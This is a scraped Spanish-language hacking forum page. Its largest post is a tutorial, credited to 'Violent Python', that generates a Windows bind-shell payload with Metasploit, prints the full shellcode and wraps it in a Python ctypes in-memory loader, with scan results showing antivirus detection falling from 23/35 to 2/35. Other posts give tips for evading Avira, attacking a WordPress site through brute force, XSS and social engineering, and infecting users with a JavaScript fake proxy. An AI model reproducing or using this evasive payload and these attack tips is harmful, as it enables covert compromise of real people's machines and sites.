You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si nos pasaras la URL te podriamos intentar ayudar..

+10

sabes al menos por que quieres backtrack?
si es compatible con ubuntu no creo te de problemas puesto que bt esta basado en ubuntu.

Si no simplemente instalate ubuntu y añade los repos de BT

Ahora tambien le das a AutoIT? buen aporte man.

Tienen pensado restaurarla pero por el momento estará K.O

Dalee

Si tienes acceso al router puedes pasarlo por un fake proxy que infecte por js al conectarse.
O bien pasale un scan fingerprinting y mira su SO , con suerte puedes atacar por fast track

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Diabl0

Cuando descargues el Exploit lo puedes ubicar en la siguiente carpeta del Metasploit si estas utilizando Backtrack 5 R.x

root@bt:/pentest/exploits/framework/modules/exploits#

ahi encontraras una serie de directorios donde podras guardar de acuerdo el tipo de Exploit (aix ,bsdi ,freebsd,irix  ,multi    osx,unix ,apple_ios  dialup  hpux     linux  netware  solaris  windows)

Ejemplo :

!. Descargo  el exploit "ie_execcommand_uaf.rb"

2. copiar o mover a

            root@bt:/pentest/exploits/framework/modules/exploits/windows/browser

3. para utiizarlo 

msf > use exploit/windows/browser/ie_execcommand_uaf

Espero que se de ayuda esta información

Menudo copy paste no? XD Ahora dime donde esta en alguna pc que no lleve BT JAJAJAJA

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Yo también de España, como Sanko, estoy de acuerdo con todo lo que ha dicho, pero añadiría:
    - Donde los jóvenes viven por y para el fútbol, donde los demás deportes quedan de lado.

+1 , si algún dia llego al poder lo primero que haría sería rebajar el sueldo de todos los clubs si quieren seguir jugando a futbol en "mi pais" y con lo que nos sacamos lo invertimos en sanidad y educación y a ver quien tendría mejor nivel de vida que nosotros... xd

Yo soy de Españistan/Caspalandia.
Aqui tenemos costumbres idiotas en las que torturan animales para entretenerse.
Tenemos un bipartidismo entre dos gobiernos analfabetos.
Tenemos de las mayores tasas de desempleo en proporción a territorio/población.
Tenemos un iva del 21% quemando records.
Tenemos un REY que no hace más que comer, sacar su barco y cazar elefantes.
Y no podría parar de poner defectos así que ahi lo dejo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
tienes el fuente? En caso de tenerlo te recomiendo que busques las APIs de forma dinamica... eso suele desmontar al AVIRA, pero no lo hagas colocando el nombre de la funcion en el API directamente... encriptalo. sobre todo busca el WriteFile.

Si no te funciona procura reconstruir el PE-Header luego de que indexas el archivo que cifras, cualquier diferencia entre el tamaño del ejecutable y su cabecera hace que el Avira llore.

Disculpa que dude de tu explicación pero desde binario DUDO MUCHO que puedas eliminar una dropper... y si lo haces sería a base de compresores.
Lo que dices del PE-Header lo más seguro es que destrozara el binario entero...alguien que sepa sobre asm y como funcionan pues lo más seguro la dejaría clavada pero alguien que hace malware por aburrimiento como este user lo más seguro rompa todo.

Lo más sensato sería utilizar un runpe shellcode sencillito , encriptas el shellcode y lo desencriptas en la memoria para ya procesarlo y ADIOS AVIRA.
Un buen consejo por parte de metal y COMPROBADO.

De lujo capo.

pasa el link de la página , sino pues pasamelo por MP , le echo un ojo.

Antes de eso comprueba cual es su host.
Nslookup y set q=ns
Si es muy famoso casi mejor no pierdas el tiempo con el reverse , si no pues merece la pena intentar rootearlo para llegar a tu objetivo.

No tienes porque disculparte.
Solo quiero decir que si no te ha funcionado ya con las digamos "vulnerabilidades públicas" de wp nadie te dira (si es que hay , que seguro) nada privado puesto que esa info la tienen demasiado bien pagada.

oye a mi me parece muy bien que todos posteemos dudas , pero a este paso hacemos la auditoria por ti.
No hay nada imposible pero si lo hay dificil, WP no tiene un equipo de programadores "expertos" en "seguridad" para subirte una shell y pasarte links.
Si no encuentras otra forma , aprende php , descargate el código y ponte a investigar... v.v

PD : Quien algo quiere algo le cuesta.

Ese error que tu dices es un FPD que trae por defecto WP en el que ya sacas el user boswell
Si no encuentras plugins vulnerables pues o haces un bruteforce(ataque desesperado) o puedes probar reverse dns(antes informate de que host tiene)...
A menos que encuentres un xss que pues ya puedes obtar por ing social para sacarle info

PD : Me parece que en esto estas un poco perdido xd, empieza desde abajo y no corras.

prueba si tiene algún plugin vulnerable y fijate si tapo el .htaccess para que no te deje entrar en el wp-includes

Buenas , coincidio estaba leyendo un librito (Violent Python) y un capítulo trataba sobre la evasión de antivirus...
Muchos me comentaban que conocían el libro pero que nunca les dio por leerlo, entre las principales razones pues por lo de siempre...

- "ESTA EN INGLÉS y como esta en inglés pues NO LO ENTIENDO BIEN"

Bueno , en este caso voy a "adaptar" un capítulo qué me llamo la antención para que veaís que no es dificil de leerlo y que pues bueno a veces por no leer en inglés os perdeís conocer muchas cosas interesantes...

Al lio...
1. Generar shellcode con código malicioso en msf(metasploit).
2. Escribir el script en python que nos permita ejecutar ese código.

1. Generar shellcode con código malicioso en msf(metasploit):

Abrimos msf :

sanko@Sanko-PC ~ $ su
Password:
Sanko-PC sanko # msfconsole

y generaremos este payload , escribimos :

msfpayload windows/shell_bind_tcp LPORT=1337 C

Aqui nos genera el shellcode :


Ahora pasaremos directamente ese shellcode a exe y escanearemos :


y lo analizamos en un scanner online para por cuantos av's es detectado :


BBCode :
[spoiler] RESULTS:   23/35
AVG Free - Trojan horse Agent_r.OV
ArcaVir -
Avast 5 - Win32:Sileco [Trj]
AntiVir (Avira) - TR/Crypt.XPACK.Gen5
BitDefender - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
VirusBuster  -
Clam  - Trojan.MSF_Shellcode
COMODO  - TrojWare.Win32.TrojanDownloader.Small.~AOLO@104254503
Dr.Web - Trojan.Packed.196
eTrust-Vet - Win32/ASuspect.HHGCP
F-PROT  - W32/SmallTrojan.M.gen!Eldorado (generic, not disinfectable)
F-Secure  - Trojan:W32/Shell2Exe.A
G Data - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, Win32:Sileco [Trj]
IKARUS  - Trojan.Win32.Swrort
Kaspersky  -
McAfee - Generic Downloader.fa
MS  Essentials - TrojanDownloader:Win32/Sileco.A
ESET NOD32 - Trojan.Win32/Shellcode2EXE.A
Norman - winpe/Swrort.A
Norton  -
Panda  -
A-Squared - Trojan.Win32.Swrort!IK
Quick Heal  - Trojan.Agent.ATV.n3
Solo  -
Sophos - Mal/Silvana-B
Trend Micro  - TROJ_SMALL.SMJ2
VBA32  -
Vexira  -
Zoner AntiVirus -
Ad-Aware -
BullGuard - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Immunet  - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
K7 Ultimate - Riskware ( 22533fae0 )
NANO  -
VIPRE -

File Name      shellcode.exe
File Size:   20572
File MD5:    2be1f303fa36ac3d6d5e00f38fadc551
File SHA1:   58b63498b305df218cce0949a02ab91832d96348
Check Time:  2013-01-07 02:19:27

Scan report generated by
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login[/spoiler]

23/35 , BUFF , muy quemado...

Pero esto se puede solucionar con nuestro queridito python...
Escribiremos un script que creara un buffer-string y que luego lo ejecute en memoria a traves de un módulo(API) -> Ctypes

Escribamos el script pues :

from ctypes import *
 
shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x05\x39\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")
 
memoria = create_string_buffer(shellcode, len(shellcode))
shell = cast(memoria, CFUNCTYPE(c_void_p))
shell()

Ahora lo pasamos a aplicación con py2exe y lo escaneamos de nuevo:
ç

BBCode:
[spoiler] RESULTS:   2/35
AVG Free -
ArcaVir -
Avast 5 - Win32:Hijack-GL [Trj]
AntiVir (Avira) -
BitDefender -
VirusBuster  -
Clam  -
COMODO  -
Dr.Web -
eTrust-Vet -
F-PROT  -
F-Secure  -
G Data -
IKARUS  -
Kaspersky  -
McAfee -
MS  Essentials - Trojan:Win32/Swrort.A
ESET NOD32 -
Norman -
Norton  -
Panda  -
A-Squared -
Quick Heal  -
Solo  -
Sophos -
Trend Micro  -
VBA32  -
Vexira  -
Zoner AntiVirus -
Ad-Aware -
BullGuard -
Immunet  -
K7 Ultimate -
NANO  -
VIPRE -

File Name      Bindshell.exe
File Size:   3440179
File MD5:    b36d2d0ba10d154436add0ea1635e6ec
File SHA1:   f96b7843f16ee4670e0c27f1d5a9a0ccdf71b4e3
Check Time:  2013-01-07 01:30:55

Scan report generated by
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login[/spoiler]

Avast y Essentials.. link reporte = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ahora comprobemos que el payload se ejecuta correctamente...


Todo correcto al parecer...
Bueno, con esto es todo , espero os agradará el articulo.

Un Saludo ,
Sanko.

Referencias : Creditos para el libro "Violent Python" esto tan solo es una explicación basada en lo que leí.
Traducido al español y explicado como me parecio más adecuado.

Todo pythoner y pentester tiene buen sitio aca xd.
Bienvenido y pasatela buena.

Macho esos diseños que dices haran que esto acabe como un lugar de mariposas